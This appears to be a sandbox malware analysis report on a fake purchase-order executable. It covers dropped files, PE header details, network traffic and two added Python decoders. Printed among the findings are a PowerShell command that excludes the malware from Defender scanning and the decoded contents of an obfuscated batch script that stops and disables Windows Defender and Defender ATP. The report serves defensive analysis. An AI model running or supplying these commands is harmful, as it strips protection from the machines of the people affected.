                                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210408122441..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 445817 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\08042021New-PurchaseOrder.exe -Force..Process ID: 3636..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210408122441..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\08042021New-PurchaseOrder.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210408122931..Username: computer\user..RunA
                                                                                    C:\Users\user\Documents\20210408\PowerShell_transcript.445817.ku7owyer.20210408122414.txt
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):5845
                                                                                    Entropy (8bit):5.400354439564955
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:BZYhtNcqDo1Z5ZchtNcqDo1ZqMGkjZmhtNcqDo1Zj100/Z8:Y
                                                                                    MD5:360118D3E5E153530C9CF66B5A41EFFB
                                                                                    SHA1:93A5D02A88AC85B0C6A71B509455F0D9A1605A47
                                                                                    SHA-256:A52C0F3D078CB67B58D27BC1A139A66965557978522977DE39EF408F7B060DEE
                                                                                    SHA-512:060F0692A71A5BF4CB43A2952A168D96D0EA2B6249DBB650FCBCB72B26D2F755DE2CA20FDAA34AEEC13D782C3F5F8731844FB8C184B3D368CD568D60B03C5902
                                                                                    Malicious:false
                                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210408122439..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 445817 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\08042021New-PurchaseOrder.exe -Force..Process ID: 5828..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210408122439..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\08042021New-PurchaseOrder.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210408122729..Username: computer\user..RunA
                                                                                    C:\Users\user\JMfuFTspQyAokpYkLoiLJnktrYABdrUoj
                                                                                    Process:C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):5128155
                                                                                    Entropy (8bit):3.033446165324156
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:yKhvmsqbzKhvmsqbpedqCzKhvmsqbpedqCt:U
                                                                                    MD5:14F9C1984DB22EF66B73F7818CCD792A
                                                                                    SHA1:DD973A3668A9B7C5D505EF132D191B42BCDF8879
                                                                                    SHA-256:37DB6E90DF6101E3FD7D1DC2A0FC476EE0EB3AD7FD50AFFD8A89E447668758F2
                                                                                    SHA-512:B95110CBAC27CDCCCB1A8A320AB04EF8341BA79CAEA28DC4FA3647C53AE35A645225C97D3384D3750B7DB8E6E46E9DF9887A34CDFACF317B64CAE07B3D511E47
                                                                                    Malicious:false
                                                                                    Preview: 77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 128 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 80 69 0 0 76 1 3 0 76 142 41 180 0 0 0 0 0 0 0 0 224 0 34 0 11 1 80 0 0 102 10 0 0 6 0 0 0 0 0 0 94 133 10 0 0 32 0 0 0 160 10 0 0 0 0 128 0 32 0 0 0 2 0 0 4 0 0 0 0 0 0 0 4 0 0 0 0 0 0 0 0 224 10 0 0 2 0 0 0 0 0 0 2 0 64 133 0 0 16 0 0 16 0 0 0 0 16 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 4 133 10 0 87 0 0 0 0 160 10 0 212 3 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 192 10 0 12 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 8 0 0 0 0 0 0 0 0 0 0 0 8 32 0 0 72 0 0 0 0 0 0 0 0 0 0 0 46 116 101 120 116 0 0 0 100 101 10 0 0 32 0 0 0 102 10 0 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 9
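The file C:\Users\user\JMfuFTspQyAokpYkLoiLJnktrYABdrUoj is 5 MB of ASCII digits, and its preview begins 77 90 144 0 ..., which is the DOS header of a PE image written out as space-separated decimal byte values (77 90 = "MZ", the four values at offset 60 give e_lfanew = 128, and 80 69 0 0 = "PE\0\0" sits exactly there). The decoder below is an added example written for this report, not code from the sample, the dropper or Joe Sandbox. The function names are mine, the embedded input is the first 152 values of the preview (DOS header, DOS stub and COFF file header), and ANALYSIS_TIME is taken from the 20210408 date in the transcript file names.

```python
import struct
from datetime import datetime, timezone

# Sample input: the first 152 values of the report's preview of
# C:\Users\user\JMfuFTspQyAokpYkLoiLJnktrYABdrUoj, covering the DOS header,
# the DOS stub and the COFF file header. Offsets are given in the comments.
SAMPLE_TEXT = (
    "77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 "                     # 0x00 "MZ"
    "184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 "                          # 0x10
    "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 "                             # 0x20
    "0 0 0 0 0 0 0 0 0 0 0 0 128 0 0 0 "                           # 0x30 e_lfanew at 0x3C
    "14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 "          # 0x40 DOS stub code
    "105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 "  # 0x50 "is program canno"
    "116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 "      # 0x60 "t be run in DOS "
    "109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 "                # 0x70 "mode.\r\r\n$"
    "80 69 0 0 76 1 3 0 76 142 41 180 0 0 0 0 "                    # 0x80 "PE\0\0" + COFF header
    "0 0 0 0 224 0 34 0"                                           # 0x90 opt. hdr size, flags
)

# Analysis date, from the 20210408 directory and transcript names in the report.
ANALYSIS_TIME = datetime(2021, 4, 8, tzinfo=timezone.utc)

MACHINE_NAMES = {0x014C: "i386", 0x8664: "x64", 0x01C4: "ARMNT", 0xAA64: "ARM64"}


def decode_decimal_bytes(text):
    """Convert "77 90 144 0 ..." back into bytes; any non-byte token is an error."""
    out = bytearray()
    for token in text.split():
        value = int(token)  # ValueError on anything that is not an integer
        if not 0 <= value <= 255:
            raise ValueError(f"not a byte value: {token}")
        out.append(value)
    return bytes(out)


def parse_pe_header(data):
    """Check the MZ and PE signatures and return the COFF file header fields."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature at e_lfanew")
    (machine, sections, timestamp, _symtab, _nsyms,
     opt_size, characteristics) = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    return {
        "e_lfanew": e_lfanew,
        "machine": machine,
        "machine_name": MACHINE_NAMES.get(machine, hex(machine)),
        "sections": sections,
        "timestamp": timestamp,
        "compiled_utc": datetime.fromtimestamp(timestamp, tz=timezone.utc),
        "size_of_optional_header": opt_size,
        "characteristics": characteristics,
    }


def timestamp_plausible(header, analysis_time):
    """False when the claimed build time is after the analysis or before Win32 existed."""
    built = header["compiled_utc"]
    return datetime(1995, 1, 1, tzinfo=timezone.utc) <= built <= analysis_time


def decode_file(src_path, dst_path):
    """Rebuild the PE from a dropped decimal-text file on disk and return its header."""
    with open(src_path, "r", encoding="ascii") as fh:
        data = decode_decimal_bytes(fh.read())
    with open(dst_path, "wb") as fh:
        fh.write(data)
    return parse_pe_header(data)


if __name__ == "__main__":
    hdr = parse_pe_header(decode_decimal_bytes(SAMPLE_TEXT))
    for key, value in hdr.items():
        print(f"{key:>24}: {value}")
    print("timestamp plausible:", timestamp_plausible(hdr, ANALYSIS_TIME))
```

On the preview bytes this yields an i386 image with 3 sections and a COFF TimeDateStamp of 0xB4298E4C, a date in 2065, so the build time is forged, which is what the "Binary contains a suspicious time stamp" signature looks for. Run decode_file on the full 5128155-byte dropped file to recover the complete payload for static analysis; the header is at the front, so a decode error after the MZ/PE check points at junk inside the number stream rather than at the encoding scheme.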
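The test.bat dropped into both Temp directories above (identical hashes) uses cmd.exe percent-expansion obfuscation: every character of the real command is separated by a reference to a random environment variable such as %nmb% or %lvjgxfcm%, and a batch interpreter expands an undefined variable to nothing, so the script runs as written while string scanners see only noise. The decoder below is an added example written for this report, not code from the sample or from Joe Sandbox. The function names are mine, and the embedded input is the first four preview lines above with the sandbox's ".." placeholders for the CRLF line terminators written as "\r\n" (the fifth preview line is cut off mid-token and is omitted).

```python
import os
import re

# Constructed sample: the first four lines of the dropped test.bat, copied
# from the report's preview. The sandbox renders the CRLF line terminators
# (file type: "with CRLF line terminators") as "..", written here as "\r\n".
SAMPLE_BAT = (
    "@%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% "
    "%aqeoe%o%mitd%f%puzu%f%bjs%\r\n"
    "%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o"
    "%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n"
    "%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n"
    "%slmffy%d%azh%\r\n"
    "%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n"
    "%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n"
    "%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d"
    "%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t"
    "%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b"
    "%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%\r\n"
    "%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o"
    "%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n"
    "%qhj%s%llxrmrlqje%e%tutofje%\r\n"
)

# %NAME% where NAME contains neither % nor a line break; an empty NAME is %%.
_PERCENT_REF = re.compile(r"%([^%\r\n]*)%")


def expand_batch(text, env=None):
    """Emulate cmd.exe percent expansion as it happens inside a batch file.

    %NAME% becomes the variable's value when NAME is defined in env (matched
    case-insensitively, as cmd.exe does) and disappears entirely when it is
    not; that disappearance is what the obfuscation relies on. %% is a
    literal %. A % with no closing % is left untouched here; the sample does
    not use that form.
    """
    lookup = {k.upper(): v for k, v in (env or {}).items()}

    def replace(match):
        name = match.group(1)
        if name == "":
            return "%"
        return lookup.get(name.upper(), "")

    return _PERCENT_REF.sub(replace, text)


def referenced_names(text):
    """Variable names the script references, to compare against the target's environment."""
    return sorted({m.group(1) for m in _PERCENT_REF.finditer(text) if m.group(1)})


def decoded_commands(text, env=None):
    """Expanded, non-empty lines in the order cmd.exe would execute them."""
    return [line for line in expand_batch(text, env).split("\r\n") if line.strip()]


def defender_tampering(commands):
    """Decoded lines that stop or reconfigure the Defender services by name."""
    pattern = re.compile(r"^\s*sc\s+(stop|config)\s+(windefend|sense)\b", re.I)
    return [c for c in commands if pattern.search(c)]


if __name__ == "__main__":
    commands = decoded_commands(SAMPLE_BAT, os.environ)
    for command in commands:
        print(command)
    print("variables referenced:", len(referenced_names(SAMPLE_BAT)))
    print("Defender tampering:", defender_tampering(commands))
```

The four preview lines decode to "@echo off", "sc stop windefend", "sc config windefend start= disabled" and "sc stop Sense", i.e. the script stops and disables the Windows Defender and Defender ATP (Sense) services. When decoding the full file, pass the environment of the machine it was meant to run on: a variable name that happens to be defined there would expand to its value instead of vanishing, and referenced_names lists exactly the names to check.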

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Entropy (8bit):6.50608873264544
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:08042021New-PurchaseOrder.exe
                                                                                    File size:32008
                                                                                    MD5:27233176a2a979195b01a53ec16c7631
                                                                                    SHA1:0ef424d2000f18e6b83473535bf85d22ed9ab79b
                                                                                    SHA256:397a62fc978f7a97a87caaf9c35e98e4a053de4e786beee73a6c1ac0e99c9fc9
                                                                                    SHA512:f8a620ca97069fa352621bb76c1c83bdebb7692f0b80de2e9d273ebb718d4d4ba412f2b057580023bd646da09647d82e035f6c2ad28e59200b7433fd1ab2d0e7
                                                                                    SSDEEP:768:/FmaU0mnYm/8KfVJlIAHcQxGflnBieit0JLkbPd2HdPIZy75V3qKncMrGDDkhx6Z:/FmaU0mnYm/XfFHcQiv2
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..^..........~}... ........@.. ..............................S.....@................................

                                                                                    File Icon

                                                                                    Icon Hash:00828e8e8686b000

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x407d7e
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:true
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                    Time Stamp:0xEDF52E0E [Wed Jul 4 19:25:02 2096 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:v4.0.30319
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                    Authenticode Signature

                                                                                    Signature Valid:false
                                                                                    Signature Issuer:C=SoWutqXeLnMOwqJXId, S=NnUboBWoYwqDIwY, L=MbQcaOFzeHlcRYjymxStxewIKRBTmsTOLhaAui, T=TzAsjhqPvzbVTQm, E=aWqTCgKxvSbvBYMruQaKZAVvZLTXwFQbGWtnMFYTbrwiC, OU=VDEHuCSrWVaYfpynkGXgslgiPshrtkDGheEyNpkXvynJDYrAu, O=LNLPWkIrAxQDzcsXFAnPjFEWxPTohWRIy, CN=QyacKfEuUpipdGqortkydaovyOIOBGilxuiv
                                                                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                    Error Number:-2146762487
                                                                                    Not Before, Not After
                                                                                    • 4/8/2021 12:06:52 AM 4/8/2022 12:06:52 AM
                                                                                    Subject Chain
                                                                                    • C=SoWutqXeLnMOwqJXId, S=NnUboBWoYwqDIwY, L=MbQcaOFzeHlcRYjymxStxewIKRBTmsTOLhaAui, T=TzAsjhqPvzbVTQm, E=aWqTCgKxvSbvBYMruQaKZAVvZLTXwFQbGWtnMFYTbrwiC, OU=VDEHuCSrWVaYfpynkGXgslgiPshrtkDGheEyNpkXvynJDYrAu, O=LNLPWkIrAxQDzcsXFAnPjFEWxPTohWRIy, CN=QyacKfEuUpipdGqortkydaovyOIOBGilxuiv
                                                                                    Version:3
                                                                                    Thumbprint MD5:02D117FF6729F8502B772DCB43B50C3A
                                                                                    Thumbprint SHA-1:AD87EC167C0EE2A6460B720995D1615054EFD17C
                                                                                    Thumbprint SHA-256:EAC36CA8694D2ABDF442E1AD9F62C45DDF61B2AF796C976F70010E21DABF7754
                                                                                    Serial:0085C0DD93B9A20656D03F3DDE5B6544CB

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    jmp dword ptr [00402000h]
                                                                                    add byte ptr [eax], al

                                                                                    Data Directories

                                                                                    Name | Virtual Address | Virtual Size | Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7d28 | 0x53 | .text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x8000 | 0x598 | .rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x6800 | 0x1508 | .text
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa000 | 0xc | .reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                                    Sections

                                                                                    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                                    .text | 0x2000 | 0x5d84 | 0x5e00 | False | 0.310588430851 | data | 6.24624470623 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                    .rsrc | 0x8000 | 0x598 | 0x600 | False | 0.41015625 | data | 4.03133223021 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .reloc | 0xa000 | 0xc | 0x200 | False | 0.044921875 | data | 0.0815394123432 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    Name | RVA | Size | Type | Language | Country
                                                                                    RT_VERSION | 0x80a0 | 0x30c | data | |
                                                                                    RT_MANIFEST | 0x83ac | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                                                                    Imports

                                                                                    DLL | Import
                                                                                    mscoree.dll | _CorExeMain

                                                                                    Version Infos

                                                                                    Description | Data
                                                                                    Translation | 0x0000 0x04b0
                                                                                    LegalCopyright | Copyright 2021
                                                                                    Assembly Version | 1.0.0.0
                                                                                    InternalName | Dimbono.exe
                                                                                    FileVersion | 1.0.0.0
                                                                                    CompanyName |
                                                                                    LegalTrademarks |
                                                                                    Comments |
                                                                                    ProductName | Dimbono
                                                                                    ProductVersion | 1.0.0.0
                                                                                    FileDescription | Dimbono
                                                                                    OriginalFilename | Dimbono.exe

                                                                                    Network Behavior

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                    Apr 8, 2021 12:23:50.833547115 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.833559990 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.833734035 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.834213018 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.834225893 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.834347963 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.835005999 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.835035086 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.835417032 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.835597992 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.835613012 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.835979939 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.836270094 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.836349010 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.836896896 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.836910963 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.837260962 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.837270975 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.837651968 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.837676048 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.838177919 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.838206053 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.838280916 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.838500977 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.838963032 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.855664968 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.855694056 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.855797052 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.855849981 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.855865002 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.856442928 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.856614113 CEST44349704172.67.150.212192.168.2.3

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 8, 2021 12:23:42.917279005 CEST | 51281 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 12:23:42.929795980 CEST | 53 | 51281 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 12:23:44.470633030 CEST | 49199 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 12:23:44.483788967 CEST | 53 | 49199 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 12:23:45.276004076 CEST | 50620 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 12:23:45.289416075 CEST | 53 | 50620 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 12:23:50.030350924 CEST | 64938 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 12:23:50.051722050 CEST | 53 | 64938 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 12:23:50.210664988 CEST | 60152 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 12:23:50.224140882 CEST | 53 | 60152 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 12:23:50.612390995 CEST | 57544 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 12:23:50.625015020 CEST | 53 | 57544 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 12:23:59.172339916 CEST | 55984 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 12:23:59.184833050 CEST | 53 | 55984 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 12:23:59.422822952 CEST | 64185 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 12:23:59.437611103 CEST | 53 | 64185 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 12:24:02.751158953 CEST | 65110 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 12:24:02.763899088 CEST | 53 | 65110 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 12:24:06.747265100 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 12:24:06.760493040 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 12:24:07.610752106 CEST | 63492 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 12:24:07.624152899 CEST | 53 | 63492 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 12:24:08.875972033 CEST | 60831 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 12:24:08.887880087 CEST | 53 | 60831 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 12:24:10.049112082 CEST | 60100 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 12:24:10.061590910 CEST | 53 | 60100 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 12:24:10.814594984 CEST | 53195 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 12:24:10.827524900 CEST | 53 | 53195 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 12:24:11.909168005 CEST | 50141 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 12:24:11.925478935 CEST | 53 | 50141 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 12:24:12.664707899 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 12:24:12.677476883 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 12:24:14.338356972 CEST | 49563 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 12:24:14.351156950 CEST | 53 | 49563 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 12:24:15.088790894 CEST | 51352 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 12:24:15.101512909 CEST | 53 | 51352 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 12:24:16.885636091 CEST | 59349 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 12:24:16.897653103 CEST | 53 | 59349 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 12:24:18.523852110 CEST | 57084 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 12:24:18.535731077 CEST | 53 | 57084 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 12:24:19.051294088 CEST | 58823 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 12:24:19.070105076 CEST | 53 | 58823 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 12:24:19.475449085 CEST | 57568 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 12:24:19.489020109 CEST | 53 | 57568 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 12:24:20.178817987 CEST | 50540 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 12:24:20.191713095 CEST | 53 | 50540 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 12:24:22.196455002 CEST | 54366 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 12:24:22.209259033 CEST | 53 | 54366 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 12:24:23.142556906 CEST | 53034 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 12:24:23.155062914 CEST | 53 | 53034 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 12:24:32.258898973 CEST | 57762 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 12:24:32.271538973 CEST | 53 | 57762 | 8.8.8.8 | 192.168.2.3
Apr 8, 2021 12:24:35.758364916 CEST | 55435 | 53 | 192.168.2.3 | 8.8.8.8
Apr 8, 2021 12:24:35.776567936 CEST | 53 | 55435 | 8.8.8.8 | 192.168.2.3
